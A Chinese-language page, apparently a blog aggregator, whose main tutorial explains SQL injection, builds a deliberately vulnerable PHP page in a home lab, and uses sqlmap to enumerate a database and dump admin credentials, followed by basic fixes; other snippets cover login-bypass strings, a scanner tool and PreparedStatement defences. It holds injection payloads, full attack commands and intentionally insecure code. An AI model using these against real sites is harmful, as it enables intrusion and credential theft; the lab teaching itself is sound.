精华内容
下载资源
问答
  • SQL漏洞检测

    2017-07-30 13:58:12
    SQL漏洞的简单检测工具,python实现
  • SQL漏洞测试平台

    2018-11-19 22:53:33
    SQL漏洞测试平台,安装WAMP,然后项目部署在WAMP_HOME\apache2\htdocs下,即可。可作为SQL注入漏洞的入门平台
  • Web 程序 SQL 漏洞检测工具.zip,SQL漏洞扫描程序
  • sqlmap 进行sql漏洞注入

    千次阅读 2019-02-19 11:58:38
    有一款工具叫sqlmap主要用于识别sql漏洞并注入,这里我就写一篇教程教大家如何使用。 因为sql注入是非法的,所以我就使用两台自己的虚拟机进行测试,请大家不要在别人的网站上搞破坏。(现在大部分网站已经没有sql...

    有一款工具叫sqlmap主要用于识别sql漏洞并注入,这里我就写一篇教程教大家如何使用。
    因为sql注入是非法的,所以我就使用两台自己的虚拟机进行测试,请大家不要在别人的网站上搞破坏。(现在大部分网站已经没有sql漏洞了,修复方法也很简单)

    一、什么是sql漏洞

    要搞清楚sql漏洞,首先要搞清楚sql语句。sql全称Structured Query Language(结构化查询语言),是一种编程语言,主要应用于数据库查询。一般服务器安装的数据库有Microsoft Accessmysqlpostgreysql等等。这里我使用mysql。下面我就举一些查询的例子。
    SELECT * FROM admin WHERE user = "test" AND pass = "123456";
    这一句就是从admin表中查找usertest并且pass123456的记录,并将满足要求的记录输出,一般登录页面就是用这条语句查询的。
    但是如果我输入的密码是" OR "1"="1,用户名是test,那么sql语句岂不是
    SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
    很明显,WHERE后的表达式一定返回true,于是mysql会将每条记录都输出,而网站误以为这个用户名是正确的,然后让你以test的身份登录。
    如果网站还设有管理权限,那么你可以试试密码为" OR "1"="1" AND writable = TRUE AND ""=",这样,sql查询语句就是
    SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
    其中user = "test" AND pass = "" OR "1"="1"始终返回true,所以实际条件为
    writable = TRUE AND ""="",即writable = TRUE,于是mysql会将writabletrue的记录输出
    还有一种,是查看文章,一般是通过GET参数id来查询的
    SELECT * FROM articles WHERE id = 1;
    如果网站没有对id进行校验,那么不妨用id=1 AND 1=1来测试
    SELECT * FROM articles WHERE id = 1 AND 1=1;
    没报错说明可能可以注入,改成id=1 AND 1=2,如果说文章没有找到,进一步说明可以注入,在改成id=",如果mysql报错,一般网站会显示出来,那么基本上就算可以注入了。
    我就用这个例子进行注入

    二、搭建环境

    我选用的是kali linux 17.3作为攻击者,Ubuntu lts 18.04作为受害服务器,先搭建服务器,可以参考Ubuntu18.04 如何搭建Apache2+php5.6+mysql服务器,把可注入网页放在/article.php,其代码如下。

    <?php
    
    if (!isset($_GET['id'])){
    	echo '没有设置参数id';
    	die(1);
    }
    
    $host = 'localhost';
    $user = 'test';
    $pass = '123456';
    $conn = mysql_connect($host,$user,$pass);
    if (!$conn){
    	echo '无法连接至数据库';
    }
    
    $sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在这里
    $query = mysql_query($sql,$conn);
    $row = mysql_fetch_array($query);
    if (!$row){
    	echo '访问的文章不存在';
    } else {
    	echo $row['content'];
    }
    
    mysql_close($conn);
    
    ?>
    

    搭建好整个网站后,在mysql中的情形如下
    mysql
    mysql
    mysql
    当然,我注入不可能是为了看到那几篇文章,其实我通过网页也可以直接看到它,我的目的是看到一些隐私数据,比如admin表中的账号和密码

    三、注入前测试

    服务器地址为192.168.3.59,先访问网页查看是否可以注入。
    sqlmap
    sqlmap
    sqlmap
    显然,网页本身没有什么问题。使用id="进行测试。
    sqlmap
    显然mysql发现sql有语法错误,所以没有任何查询结果。
    sqlmap
    sqlmap
    和预期完全相符,说明这个页面可以注入。

    四、sqlmap注入

    对于kali linuxsqlmap默认安装。
    对于Ubuntu,使用apt install sqlmap进行安装
    对于其他系统,到官网下载源码,sqlmap使用python编写的,所以可能需要安装python
    下面开始注入。
    sqlmap -u '192.168.3.59/article.php?id=1,一定要加入GET参数,不然sqlmap不知道使用什么参数去注入。输出差不多是

    root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'
            ___
           __H__
     ___ ___[,]_____ ___ ___  {1.1.11#stable}
    |_ -| . [.]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 11:30:43
    
    [11:30:43] [INFO] resuming back-end DBMS 'mysql' 
    [11:30:43] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 1817=1817
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
    ---
    [11:30:43] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.29
    back-end DBMS: MySQL >= 5.0.12
    [11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'
    
    [*] shutting down at 11:30:43
    

    从上述输出来看,可以注入,下面正式开始注入。
    sqlmap -u '192.168.3.59/article.php?id=1' --dbs,输出是

    root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.1.11#stable}
    |_ -| . [,]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 11:37:43
    
    [11:37:43] [INFO] resuming back-end DBMS 'mysql' 
    [11:37:43] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 1817=1817
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
    ---
    [11:37:43] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.29
    back-end DBMS: MySQL >= 5.0.12
    [11:37:43] [INFO] fetching database names
    [11:37:43] [INFO] the SQL query used returns 2 entries
    [11:37:43] [INFO] retrieved: information_schema
    [11:37:43] [INFO] retrieved: website
    available databases [2]:                                                       
    [*] information_schema
    [*] website
    
    [11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'
    
    [*] shutting down at 11:37:43
    

    注入发现两个数据库information_schemawebsite
    information_schema主要是mysql数据库、表、列的信息,没有什么,website是网站的数据,对这个数据库进行注入。
    sqlmap -u '192.168.3.59/article.php?id=1 -D website --tables,输出为

    root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
            ___
           __H__
     ___ ___[(]_____ ___ ___  {1.1.11#stable}
    |_ -| . [.]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 11:41:14
    
    [11:41:14] [INFO] resuming back-end DBMS 'mysql' 
    [11:41:14] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 1817=1817
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
    ---
    [11:41:14] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.29
    back-end DBMS: MySQL >= 5.0.12
    [11:41:14] [INFO] fetching tables for database: 'website'
    [11:41:14] [INFO] the SQL query used returns 2 entries
    [11:41:14] [INFO] retrieved: admin
    [11:41:14] [INFO] retrieved: articles
    Database: website                                                              
    [2 tables]
    +----------+
    | admin    |
    | articles |
    +----------+
    
    [11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'
    
    [*] shutting down at 11:41:14
    

    发现有两张表adminarticles,作为攻击者肯定注入admin
    sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns,输出为

    root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
            ___
           __H__
     ___ ___["]_____ ___ ___  {1.1.11#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 11:43:46
    
    [11:43:46] [INFO] resuming back-end DBMS 'mysql' 
    [11:43:46] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 1817=1817
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
    ---
    [11:43:46] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.29
    back-end DBMS: MySQL >= 5.0.12
    [11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
    [11:43:47] [INFO] the SQL query used returns 3 entries
    [11:43:47] [INFO] retrieved: "id","int(11)"
    [11:43:47] [INFO] retrieved: "user","text"
    [11:43:47] [INFO] retrieved: "pass","text"
    Database: website                                                              
    Table: admin
    [3 columns]
    +--------+---------+
    | Column | Type    |
    +--------+---------+
    | user   | text    |
    | id     | int(11) |
    | pass   | text    |
    +--------+---------+
    
    [11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'
    
    [*] shutting down at 11:43:47
    

    注入得到了三列useridpass,只要得到userpass,就能得到密码(一般是网站后台管理的登录密码)
    sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump,输出为

    root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
            ___
           __H__
     ___ ___["]_____ ___ ___  {1.1.11#stable}
    |_ -| . [.]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 11:47:33
    
    [11:47:33] [INFO] resuming back-end DBMS 'mysql' 
    [11:47:33] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 1817=1817
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
    ---
    [11:47:33] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.29
    back-end DBMS: MySQL >= 5.0.12
    [11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website'
    [11:47:33] [INFO] the SQL query used returns 3 entries
    [11:47:33] [INFO] retrieved: "test1","123456"
    [11:47:33] [INFO] retrieved: "test2","123456"
    [11:47:33] [INFO] retrieved: "test3","123456"
    Database: website                                                              
    Table: admin
    [3 entries]
    +--------+--------+
    | user   | pass   |
    +--------+--------+
    | test1  | 123456 |
    | test2  | 123456 |
    | test3  | 123456 |
    +--------+--------+
    
    [11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
    [11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'
    
    [*] shutting down at 11:47:33
    

    成功得到了管理员账号和密码,注入也就到此结束。

    五、如何修复sql漏洞

    就拿我这个网页漏洞距离,修复前是

    <?php
    
    if (!isset($_GET['id'])){
    	echo '没有设置参数id';
    	die(1);
    }
    
    $host = 'localhost';
    $user = 'test';
    $pass = '123456';
    $conn = mysql_connect($host,$user,$pass);
    if (!$conn){
    	echo '无法连接至数据库';
    }
    
    $sql = 'SELECT * FROM website.articles WHERE id = '.$_GET['id']; // 漏洞就在这里
    $query = mysql_query($sql,$conn);
    $row = mysql_fetch_array($query);
    if (!$row){
    	echo '访问的文章不存在';
    } else {
    	echo $row['content'];
    }
    
    mysql_close($conn);
    
    ?>
    

    导致sql注入的原因是使用了非法字符,那么有很多解决办法。

    • 对参数进行检查,比如检查id是否为一个整数
    • 对字符串进行转移,因为有时候不得不用到引号,php可以用addslashes函数
    • 安装现成软件(虽然我不知道是什么原理,但似乎很多网站都安装了什么D盾之类的)

    六、实战

    实际上,sql注入也没这么简单,有时候需要用字典去猜表名(kali自带字典),甚至还有注入不了的情况(可能是因为字典不够),即使注入成功获得密码也有可能找不到登录入口点(一般是adminlogin文件夹中),所以本文仅仅是提供一个方法不能保证注入成功,希望对大家能有帮助。

    展开全文
  • SQL漏洞注入攻击

    2018-12-04 23:33:30
    SQL漏洞注入攻击 使用statement进行sql处理存在安全隐患eg: String sql = "select * from users where username='"+name+"' and password='"+password+"'"; stmt = conn....


    SQL漏洞注入攻击
    使用statement进行sql处理存在安全隐患eg:
    String sql = "select * from users where username='"+name+"' and password='"+password+"'";
    stmt = conn.createStatement();
    stmt.executeQuery(sql); 
    第一次登录:
    请输入用户名: 赵本山
    请输入密码: admin
    登录成功

    第二次登录: 
    请输入用户名: 赵本山
    请输入密码: admin'or'1'='1
    登录成功

    SQL漏洞注入攻击:
    原因: 
      1. 程序员在执行sql拼接的时候,直接把内容拼到SQL语句中.
      2. 在执行的时候,正好被拼接成一条恒成立的语句,形成了一个漏洞. 
    解决办法: 
      1. 不能把语句参数直接写在SQL中. 
      2. 使用参数化查询. 
    使用preparedstatement处理sql
    String sql = "select * from users where username=? and password=?";
    ps = conn.prepareStatement(sql);
    ps.setString(1,username);
    ps.setString(2,password);
    rs = ps.executeQuery();
    第一次登录:
    请输入用户名: 赵本山
    请输入密码: admin
    登录成功

    第二次登录: 
    请输入用户名: 赵本山
    请输入密码: admin'or'1'='1
    登录失败

    说明: 
    PreparedStatement接口(预编译的SQL语句)优点: 
      1. 有很高的代码可读性以及维护性. 
      2. 很大程度提高了SQL语句执行的性能. 
      3. 安全性能高,不容易遭到破解. 

    展开全文
  • Whitewidow 是一个开源的 SQL 漏洞自动扫描器,可用通过文件列表运行,或者从 Google 爬取并发现有潜在漏洞的网站。 这个工具支持自动格式化文件、随机用户代理、IP 地址、服务器信息、多 SQL 注入语法、从程序直接...

    Whitewidow 是一个开源的 SQL 漏洞自动扫描器,可用通过文件列表运行,或者从 Google 爬取并发现有潜在漏洞的网站。 这个工具支持自动格式化文件、随机用户代理、IP 地址、服务器信息、多 SQL 注入语法、从程序直接启动 sqlmap 以及一些有趣的环境。

    Whitewidow 是为学习目的而开发,旨在让用户知道漏洞是啥样的。

    截图

    启动 whitewidow 后,会有个定制的 Banner Logo,然后可以开始搜索可能易受攻击的网站:

    banner credits legal new.png

    Whitewidow 可以通过超过 1000 多种不同查询(query),从 Google 爬取发现有漏洞的网站。当然了,也支持多种 SQL 注入。

    errorblindunion

    Whitewidow 还可以检测单个网页中所有的可用链接,然后进一步搜索对应链接网页中的漏洞。

    spider.jpg

    上述做完之后,发现有漏洞的站点后,可以直接从程序启动 sqlmap,不需要另外去下载。

    sqlmap

    下载:

    直接 clone :https://github.com/WhitewidowScanner/whitewidow ,

    或者直接下载:https://github.com/WhitewidowScanner/whitewidow/releases/tag/2.0

    基本用法

    ruby whitewidow.rb -d  默认模式运行 whitewidow,用随机的搜索查询,从 Google 爬取发现潜在漏洞网站。

    ruby whitewidow.rb -f path/to/file 从指定的文件开始运行,并把 SQL 语法添加到 URL 中。

    ruby whitewidow.rb -h  查询帮助信息

    更多用法,请查看 wiki:https://github.com/Ekultek/whitewidow/wiki/Functionality

    依赖

    • gem 'mechanize'
    • gem 'nokogiri'
    • gem 'rest-client'
    • gem 'webmock'
    • gem 'rspec'
    • gem 'vcr'

    安装所有 gem 依赖,请遵循下面模板

    cd whitewidow

    bundle install

    然后就应该全部依赖都安装好了,应该正常启动 Whitewidow。

    GitHub 链接:https://github.com/WhitewidowScanner/whitewidow

    开源地址:https://github.com/WhitewidowScanner/whitewidow

    展开全文
  • 织梦dedecms cookies泄漏导致SQL漏洞

    千次阅读 2017-10-31 20:25:11
    dedecms cookies泄漏导致SQL漏洞 inc_archives_functions.php 的解决方法 1.打开\member\inc\inc_archives_functions.php文件,找到239行,将 echo ""; 替换为: echo ""; 2.批量搜索"$formfields.$cfg_...
    dedecms cookies泄漏导致SQL漏洞 inc_archives_functions.php 的解决方法
    1.打开\member\inc\inc_archives_functions.php文件,找到239行,将
    echo "<input type=\"hidden\" name=\"dede_fieldshash\" value=\"".md5($dede_addonfields.$cfg_cookie_encode)."\" />";
    替换为:
    echo "<input type=\"hidden\" name=\"dede_fieldshash\" value=\"".md5($dede_addonfields."dls6.com".$cfg_cookie_encode)."\" />";

    2.批量搜索"$formfields.$cfg_cookie_encode"

    3.将
    $formfields.$cfg_cookie_encode
    替换为  
    $formfields."dls6.com".$cfg_cookie_encode
    if (empty($dede_fieldshash) || $dede_fieldshash != md5($dede_addonfields.$cfg_cookie_encode))
    如图:
    修改代码为:
    if (empty($dede_fieldshash) || ( $dede_fieldshash != md5($dede_addonfields . $cfg_cookie_encode) && $dede_fieldshash != md5($dede_addonfields . 'anythingelse' . $cfg_cookie_encode)) )
    如图:
    展开全文
  • 收集的ASP、SQL漏洞相关原理及防范,还没有经过整理
  • statement主要用于执行静态的SQL...关于SQL漏洞。 例如:sql = "select * from 用户表 where 姓名=' "+name+" ' and 密码= ' "+password+" ' "; name和password放用户输入的用户名和口令。通过执行上述sql句子判断帐
  • 搜索型SQL注入及SQL漏洞测试

    千次阅读 2019-03-31 21:09:54
    首先打开客户端寻找纯在SQL注入漏洞的注入点。 通过提示可知,尝试输入一个提示字符进行搜索,z 这里我们输入字母’l’,可以看见后台给出的相关信息。 通过后台给出的数据,和平台给的输入提示。我们可以设想后台...
  • 不需在登录窗体中写入用户名和密码而进入系统的SQL语句漏洞
  • sql漏洞攻击

    千次阅读 2013-10-23 17:40:17
    SQL注入攻击的总体思路: 发现SQL注入位置;判断服务器类型和后台数据库类型;确定可执行情况 对于有些攻击者而言,一般会采取sql注入法。下面我也谈一下自己关于sql注入法的感悟。   注入法: 从理论上...
  • 漏洞名称:dedecms cookies泄漏导致SQL漏洞补丁文件:/member/article_add.php补丁来源:云盾自研漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie...
  • 漏洞名称:dedecms cookies泄漏导致SQL漏洞补丁文件:/member/inc/inc_archives_functions.php漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie进行...
  • SQL漏洞注入实例

    2012-11-29 19:10:57
     尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个号,或在表单输入号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。...
  • 14 SQL漏洞的原因:  存在or关键字和 -- 注释 15 解决方法 preparedStatement 预处理(会对关键词进行转译) 编写SQL语句(预先编译,只能在问号的地方才能输入内容(并且一个问号输入的内容是一个字符串),并且...
  • SQL漏洞之“万能登陆密码”

    千次阅读 2009-08-06 20:58:00
    SQL漏洞之“万能登陆密码”常用的“万能登陆密码”: or = or 1=1;--1 or 1=1" or ""="漏洞描述: 在login.asp中,接收用户输入的Userid和Password数据,并分别赋值给user和pwd,然后再用sql="select * from admin ...
  • SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的 参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来 实现对数据库的任意操作。 举例说明: ...
  • Pikachu——SQL-Inject-数字型注入 接下来会给大家来演示一下pikachu的案例进行演示 首先来打开pikachu,找到其中的数字注入 里面有一个post方式提出的一个请求,右边有一个下拉的一个框,点击“查询” 这里...
  • SQL Injection //后台sql语句 select * from users where username='$name' and password='$pwd'; 当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码...
  • 1、从数字型注入认识SQL漏洞 打开pikachu平台,在SQL-Inject下选择数字型注入。在cmd中输入show databases;查询查询数据库. 在这边发现到pikachu的输入库输入命令use pikachu;进入到pikachu的数据库,再输入命令 ...
  • SQL检测工具,用了一下,基本靠猜表名和字段名运行,如果攻击对象有自定义前缀的话,估计就不大好使了
  • 暴力破解在SQL漏洞中的应用

    千次阅读 2019-04-04 16:36:08
    在之前的案例中,我们都是通过information_schema这个数据库来获取的信息,但很多时候这个数据库的权限会被屏蔽掉,亦或者是遇到了其他数据库,在其中可能没有像information_schema这样的东西来给你提供查询的接口,...
  • SQL漏洞分析 —— 乌云编号(141226)

    千次阅读 2018-05-01 17:13:34
    巨人网络某站SQL注入(可读全库) 详细: 0x01 学习 挖掘工具: SQLMAP 使用指令: sqlmap.py -u "http://act.zt2.ztgame.com/haoshengyin/works.php?server=&amp;text=s" -p text -v 3 -p...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 13,469
精华内容 5,387
关键字:

sql漏洞